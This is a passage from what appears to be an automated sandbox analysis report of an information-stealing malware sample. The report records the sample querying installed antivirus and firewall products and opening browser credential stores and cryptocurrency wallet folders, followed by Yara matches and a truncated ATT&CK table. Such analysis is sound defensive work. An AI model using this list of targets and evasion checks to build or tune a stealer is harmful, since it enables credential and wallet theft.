                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeQueries volume information: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeQueries volume information: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeCode function: 0_2_00C80F8F GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,DeleteObject,CloseHandle,0_2_00C80F8F
                    Source: C:\Users\user\Desktop\owKQ0b029a.exeCode function: 0_2_00C729F2 GetVersionExW,0_2_00C729F2
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: QntRsaVyLKlY.exe, 00000016.00000002.2367553513.0000000006865000.00000004.00000020.00020000.00000000.sdmp, QntRsaVyLKlY.exe, 00000016.00000002.2373288719.0000000007C02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 17.2.QntRsaVyLKlY.exe.3a3eb50.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.PO.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.PO.exe.4116088.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.QntRsaVyLKlY.exe.3a26d30.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.QntRsaVyLKlY.exe.3a3eb50.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.PO.exe.412dea8.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.PO.exe.412dea8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.QntRsaVyLKlY.exe.3a26d30.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.PO.exe.4116088.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000011.00000002.2241712167.0000000003A26000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2262603009.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2154716570.0000000004116000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: PO.exe PID: 7400, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: PO.exe PID: 7912, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: QntRsaVyLKlY.exe PID: 8024, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: QntRsaVyLKlY.exe PID: 6976, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeFile opened: C:\Users\user\AppData\Roaming\atomic\
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\
                    Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
                    Source: Yara matchFile source: 17.2.QntRsaVyLKlY.exe.3a3eb50.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.PO.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.PO.exe.4116088.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.QntRsaVyLKlY.exe.3a26d30.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.QntRsaVyLKlY.exe.3a3eb50.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.PO.exe.412dea8.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.PO.exe.412dea8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.QntRsaVyLKlY.exe.3a26d30.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.PO.exe.4116088.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000011.00000002.2241712167.0000000003A26000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2262603009.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2154716570.0000000004116000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: PO.exe PID: 7400, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: PO.exe PID: 7912, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: QntRsaVyLKlY.exe PID: 8024, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: QntRsaVyLKlY.exe PID: 6976, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 17.2.QntRsaVyLKlY.exe.3a3eb50.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.PO.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.PO.exe.4116088.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.QntRsaVyLKlY.exe.3a26d30.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.QntRsaVyLKlY.exe.3a3eb50.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.PO.exe.412dea8.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.PO.exe.412dea8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 17.2.QntRsaVyLKlY.exe.3a26d30.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.PO.exe.4116088.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000011.00000002.2241712167.0000000003A26000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2262603009.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2154716570.0000000004116000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: PO.exe PID: 7400, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: PO.exe PID: 7912, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: QntRsaVyLKlY.exe PID: 8024, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: QntRsaVyLKlY.exe PID: 6976, type: MEMORYSTR
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts221
                    Windows Management Instrumentation
                    1
                    DLL Side-Loading
                    1
                    DLL Side-Loading
                    11
                    Disable or Modify Tools
                    1
                    OS Credential Dumping
                    1
                    System Time Discovery
                    Remote Services1
                    Archive Collected Data
                    1
                    Encrypted Channel
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts2
                    Command and Scripting Interpreter
                    1
                    Scheduled Task/Job
                    111
                    Process Injection
                    1
                    Deobfuscate/Decode Files or Information
                    LSASS Memory3
                    File and Directory Discovery
                    Remote Desktop Protocol2
                    Data from Local System
                    11
